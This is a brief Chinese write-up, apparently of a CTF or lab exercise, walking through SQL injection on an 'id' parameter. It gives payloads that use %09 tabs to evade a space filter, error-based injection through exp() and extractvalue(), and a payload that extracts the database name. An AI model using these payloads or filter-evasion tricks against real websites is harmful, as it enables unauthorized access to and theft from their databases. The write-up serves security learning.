赞
踩
知识点:
测试注入类型
构造payload:id=1'
构造payload:id=1''
测试发现是字符型注入
经过不断的测试发现空格和+被过滤了,发现%09可以代替空格绕过检测
构造payload:id=1'%09and%091='1
页面成功回显出了相关信息,说明绕过成功
页面给出了提示,联合查询关键字被过滤了,直接使用错误注入
构造payload:id=1'%09and%09exp(710)='1
页面成功回显除了exp()函数的错误信息
尝试获取数据库名
构造payload:id=1'%09and%09extractvalue(1,concat(0x7e,database(),0x7e))='1
成功获取到了数据库名;结束收工
10
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。